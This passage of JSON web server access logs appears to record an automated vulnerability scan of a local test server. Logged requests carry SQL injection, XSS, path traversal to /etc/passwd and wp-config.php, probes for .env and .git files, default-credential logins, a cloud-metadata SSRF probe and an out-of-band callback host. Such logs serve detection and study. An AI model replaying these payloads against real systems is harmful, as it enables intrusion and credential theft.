HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/robomongo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/files/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/config.exp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pools/default/buckets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"0.024","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/15 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/user/picker?query= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-devtools HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"user=admin&passwd=admin&challengePwd=&ok=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/users/search_authors HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /password.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /robomongo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22arlpass\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"{\x22@type\x22:\x22java.lang.AutoCloseable\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/pma/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"action=wpcf7r_get_nonce¶m=wp_rest","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /@https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.072","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22public\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v4/auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gruntfile.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/16 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"vfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin.php?page=vfb-export HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/wp-admin/admin.php?page=vfb-export", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/openstack/latest HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.488","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"userid=kevinlab&userpass=kevin003","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dashboard/proc.php?type=login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.054","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zdm/login_xdm_uc.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/System/MailConnect/host/ca28fg0smpvbd3qg07h0rywo7axfsy5t7.oast.live/port/80/secure/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"------WebKitFormBoundaryKc8fBVDo558U4hbJ\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2229KD21iHhLfpVXHiyW7ieS0HTsL.php\x22\x0D\x0A\x0D\x0A29KD24nwFLTXbz5XNQ8qqPCFHBe\x0D\x0A\x0D\x0A------WebKitFormBoundaryKc8fBVDo558U4hbJ\x0D\x0AContent-Disposition: form-data; name=\x22name\x22\x0D\x0A\x0D\x0A29KD21iHhLfpVXHiyW7ieS0HTsL.php\x5Cx0A\x0D\x0A------WebKitFormBoundaryKc8fBVDo558U4hbJ--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /checker/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /new/newhttp://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C/%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download/index.php?file=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.072","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.development.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": 